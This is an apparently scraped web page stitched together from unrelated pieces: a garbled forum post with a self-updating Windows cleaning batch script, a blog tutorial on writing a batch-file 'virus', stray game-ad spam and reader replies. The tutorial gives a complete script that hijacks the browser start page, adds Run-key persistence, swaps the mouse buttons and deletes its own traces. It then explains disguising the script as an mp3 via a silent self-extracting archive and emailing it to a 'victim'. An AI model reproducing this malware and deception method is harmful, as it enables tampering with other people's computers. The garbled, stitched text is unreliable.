How can I Stop / Start AVG antivirus protection from command line. This option or kill the. Tagged windows batch-file command-line antivirus or ask your.

• Antivirus File Scan Online
• Test Antivirus Files

I have spent several Days writing my new Batch cleaning script with the aim to help some friends of mine who run Windows Vista who are always getting bogged down with clutter and virus's, times are getting tough for people these days so decided to give it a go. This should work on Windows 7 or 8 it is UNTESTED on win 7 or 8 so use at own risk, I would be Interested in others who would like to try it out and send me some feedback? My question is can people verify if this works ok on other windows operating systems, the reason I ask is I want my script which is a bit of block code from several other sources I found online which I combined and adapted to the needs of my friends, and of coarse myself. It is purely an Automation Script which I designed to be flexible in various situations, so that it could run some portable applications as well just in case people do not want to install anything extra on their machines, for example it runs MBAR the portable MalwareBytes RootKit Removal tool, but you will have to place that in the Mbar folder below this batch files path for that to work. My batch file ALSO uses some system optimization tools from SYSINTERNALS if you do not have these tools installed my batch should just skip by them, I am curious as to how well it works on other versions of windows but I am limited to XP and Vista here.

Thanks Michelle:: Beginning of Batch Cleaning Script @echo off goto nodebug:: @@@@@ Below Block is for Debugging Purposes Only @@@@@ @echo on echo ERROR TEST LOG FLAG IF NOT%1!/go!%0 /go 1C: state%n0.log 2&1 SHIFT ECHO%1%2%3%4%5:: @@@@@ Above Block is for Debugging Purposes Only @@@@@@:nodebug::::::::::::::::::::::::::::::::::::::::::: Automatically check & get admin rights::::::::::::::::::::::::::::::::::::::::::: echo Hello Computer Name:%computername% echo. ECHO ECHO Running Admin shell ECHO :checkPrivileges NET FILE 1NUL 2NUL if '%errorlevel%' '0' ( goto gotPrivileges ) else ( goto getPrivileges ):getPrivileges if '%1'ELEV' (shift & goto gotPrivileges) ECHO. ECHO.

ECHO Invoking UAC for Privilege Escalation ECHO. setlocal DisableDelayedExpansion set 'batchPath=%0' setlocal EnableDelayedExpansion ECHO Set UAC = CreateObject^('Shell.Application'^) '%temp% OEgetPrivileges.vbs' ECHO UAC.ShellExecute '!batchPath!' , 'ELEV', ', 'runas', 1 '%temp% OEgetPrivileges.vbs' '%temp% OEgetPrivileges.vbs' exit /B echo Current path is%cd% echo Changing directory to the path of the current script cd%dp0 echo Current path is%cd%:gotPrivileges::::::::::::::::::::::::::::::START:: @@@@@@@@@@@@ DEEP OR QUICK MODE SELECTION BELOW @@@@@@@@@@@@ @For /F 'tokens=1,2,3,4 delims=/ '%%A in ('Date /t') do @( Set Day=%%A Set Month=%%B Set Year=%%C ) echo - echo%Year%-%Month%-%Day% echo.

Set choice=n echo - echo Do you want to RUN Manual Deep Scans ALSO? Press: y: then: ENTER. Echo NOTE: Some of these deep scans can take a long time to complete. Echo You should only run the DEEP scans about once a month to save time. Echo OR If you KNOW their is a problem with your computer and it needs fixing.

Echo If you Want FULL Automation and DO NOT want to echo be bothered with DEEP Manual Scans JUST Press Enter. Echo - set /P choice=: y or n ^ echo. Updated Version 7 Fixed Date Local with new code found:: Made some major improvements runs much better now.:):: Reason I am doing this is because The folks on Computing.net:: have given so much great support I just wanted to give something:: back thank you.

Please NOTE; Since I wrote this Batch file I have made a lot more improvements to it, it even has a SELF UPDATING FEATURE now I built in, this means when you run it the first thing it does is check my private FTP for updates and then downloads the file as Clean6.new it then does a file check on Clean6.new To make sure it is not a ZERO BYTE file as can happen on ftp downloads. Once the new update is validated it over writes itself and goes back to the start of the batch after setting a flag value to 1 to prevent loops. I can provide people with my self updating batch on a PRIVATE MESSAGE basis only as clearly putting my FTP details on a public forum does pose some risks from being hacked. My server is however well protected and backed up on image iso format so the risk is small is retrospect, it all depends on TRUST if you trust me and I trust you:p We do live in precarious days i'm afraid with virus's and malware, do one benefit of my self update is the copy is renewed each time you run it ensuring you have a good copy on your pc, to just give you some idea on the added features I list them below. My new Clean6.bat now does the following.

1/ After all the scans and before a defrag runs SFC automatically if a windows SETUP CD is in the CD drive and multiple virus and spy ware problems are found AFTER CLEANING 2/ Ignores CD and DVD drives during a defrag 3/ Now runs cleanmgr.exe in 2 modes custom and standard 4/ a few other optimisations and self checks The current file size of Clean6.bat is 46kb Michelle WATCH My Video If Dreams Come True Oleg Would be Famous so far he's very shy, so much for Being Famous;) message edited by Ortorea. I have added quite a few new functions and checking to my Auto-clean Scheduler Batch as I keep making more improvements, I did not want to flood the forum here with all the updates I made. Instead you can run my test.bat which retrieves the latest stable version Automatically You can also check the contents of my remote ftp server here Michelle xoxoxox PS, IF you feel the slightest bit wary of running my script why not try it out in VIRTUALBOX first? If Dreams Come True Oleg Would be Famous so far he's very shy, so much for Being Famous;) message edited by Ortorea.

I have just been informed by some friends using WINDOWS 8.1 of a bug that causes FTP downloads and uploads to fail, this will also prevent using my batch file's update feature see this article, it appears to be caused by Internet Explorer 11 I have not been able to circumvent this BUG in Windows 7 and 8 it seems the latest version of Windows ftp does not support passive mode, so I have included a free 3rd part ftps free standing (not installed) application with my new batch file here. This small batch file should be able to retrieve updated files on any version of windows and is much better for compatibility reasons.

Michelle Michelle xoxox If Dreams Come True Oleg Would be Famous so far he's very shy, so much for Being Famous;) message edited by Ortorea. Just an Update I have now fixed a whole bunch of things and it works on windows 7 32 bit and 64 bit versions now, you can download the updated version here Happy Holidays from Me Ortorea.

Antivirus File Scan Online

It’s always been this way that we fellows be the good guys and save the day fighting malware threats But as they say, you need to think like a criminal to catch one! And so we do the same, to understand how a malware works, how does it gains access, gains control, we will our self make a batch file based virus. A little knowledge of programming, just to extent how we do it, and knowledge of windows registry is a prerequisite. Batch files, characterised by their.bat extension, are files containing a sequence of DOS commands that gets executed when the batch file is run. This allows you to make simple programs that perform simple tasks under limitations of DOS shell.

Though higher level languages like BASIC, PASCAL and C interacts with system on lower level, batch file processing is a good start to understand malware. The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch. The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file. Before code, let’s learn a few basics, first on creation on batch files. These aren’t any special files created by some special applications.

They are simple notepad files, where in code is written and then its extension changed to.bat. They run simple tasks like MOVE, COPY, RENAME etc, a few moderate tasks like changing file attributes ( i.e. Making a file hidden, giving system attribute or removing the attributes) and a few complex tasks like altering a system registry without user intermission.

The main draw back in a batch file is that it doesn’t remain active in memory (though we can make it by some loop), it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself. Now, let’s learn a few commands of batch files.

Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is- RENAME Drive: path filename1 filename2 Example: RENAME C: documents and settings aijaz.txt gyaan.dat Hence we see we can change the extension of file as well.

If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running. Example: RENAME aijaz.txt gyaan.dat This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat. Coming to MOVE command, it moves the file from one path to another. It is like cut and paste.

The syntax is- MOVE /Y /-Y drive path filename destination The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user. Example: MOVE /Y C: aijaz.txt D: This moves the file aijaz.txt to drive D:. While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory. We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory– C: Documents and settings ”user name” local settings application data Microsoft But the windows directory may be different drive like D:, E: and even the user name isn’t known. This makes it not suitable to mention a specific path in our code.

We use system parameters to identify windows drive and user profile directory. The command –%userprofile% returns the path of the location highlighted in above command. To give path in CMD using system parameters, we need to write path in quotation marks.

The command to change wallpaper becomes- MOVE /y Wallpaper1.bmp “%USERPROFILE% Local Settings Application Data Microsoft” This copies the wallpaper from current directory to the location where wallpaper is stored. Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers.

Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap. Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command- RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters After the execution of batch file, it is desired that it isn’t available to host PC that he may open it and view the code, which discloses the location of our batch virus and also the registry key we have added.

This is done by simply deleting the files. Del /F /Q /A:SHR filename /F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.

Now coming to editing registry, there are two methods of editing a key, first by making a.REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command. The syntax to add a key to registry is- REG ADD main key /v Sub key /t data type /d value /f The /f parameters enables editing a key without confirmation from user. Our intention is to add a start-up entry in registry such that our code gets executed every time windows logs on.

Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is- REG ADD HKCU SOFTWARE Microsoft Windows CurrentVersion Run /v winlogon /t REGSZ /d%windir% force.exe /f The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use%windir% parameter to make sure that no error is encountered in case OS is installed on some other drive. The point to be noticed here is that the same technique is used by malware to make sure they remain active in memory. The first thing to be done having ended a malicious code execution is to terminate its start-up mechanism. Refer the post Eradicate malware. Similarly to change the start page of internet explorer (tested on IE 6), the registry key is- REG ADD HKCU Software Microsoft InternetExplorer Main /v StartPage /t REGSZ /d /f Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack.

Test Antivirus Files

I am still working on changing start page of Mozilla Firefox. Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more!

Here is the command. RUNDLL32.exe USER32.DLL,SwapMouseButton Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script. @ECHO OFF REG ADD HKCU Software Microsoft InternetExplorer Main /v StartPage /t REGSZ /d /f REG ADD HKCU SOFTWARE Microsoft Windows CurrentVersion Run /v winlogon /t REGSZ /d%windir% force.exe /f copy /y Wallpaper1.bmp “%USERPROFILE% Local Settings Application Data Microsoft” RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters RUNDLL32.exe USER32.DLL,SwapMouseButton rename song.exe force.exe move /y force.exe “%windir%” del /Q force.bat del /Q wallpaper.bmp Save the file and change its extension to.bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can be simply be done by opening the file in note pad and making it funny or if you how to, edit it in Photoshop.

Or sites like photo funaic can be used to spoil the photo. Usually these photos are JPEG format. As mentioned earlier, we need a bitmap image.

Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of photo. Rename this photo to wallpaper1. It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX. Install IconFX and run it.

In file menu, go to extract icons. Browse for shell32.dll file located in windows system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an.ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon.

Save the icon at some location. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option. In the opened window, click Create SFX archive. Go to Advanced tab and SFX options in it.

In path to extract, select create in current folder. In setup program section, in Run after extract, add name as force.bat. In Modes tab, under silent mode section, select hide all. In update tab, in overwrite section, select overwrite all files.

In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single.exe file which has an icon of mp3 file. Let’s rename this file as song. Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.

Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intensions! But the problem here is that if we mail it as it is, either clients like Yahoo doesn’t allow attaching.exe files, also when victim downloads the file, its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple.RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!! Though I am still working on making better ones, but I would like to end this post with a message that this was just for a little fun and to develop an understanding how malware works. Let’s not drift towards the wrong side of society!

On said: Hi Saurav! There are viruses that can be removed using batch files, provided you know what virus it is, and you know all and where it has its files and registry keys. This is really a interesting job, tedious though, but not worth it until the virus isn’t being caught by normal antiviruses. In your case, I advice a scan with Malwarebytes. Once finished, just run RatsCheddar tool to fix policies.

Than once done, run a HijackThis scan and send me the log. I will go through it and send you, if required, a batch file to fix the remaining issues. What all I know comes from my experiences with my PC, since at that times I didn’t have internet, and there was no one to help and guide. Now that I have it, I am using it to expand my knowledge, and help other people out 🙂. On said: When you aren’t able to remove an infected file from your pen drive, this imply implies that your PC is infected now too. I make the same advise as before, a scan with Malwarebytes.

99 New Driving Games 297 New games of cars and trucks of all classes. Supersonic rc racer lego games. The best 3D games.

Install it, update and run a complete full scan, while keeping pen drive plugged in and including the pen drive in the scan. There are ways you can remove them manually, but it is long and tedious. You can read my post on to learn more anyhow.

And for the learning zeal, start off by experimenting, read my post, try to put it to practice in your case. You can read tech magazines, like I prefer Chip. Since you have internet, explore tech sites. And do new things with your PC. Its really fun.!!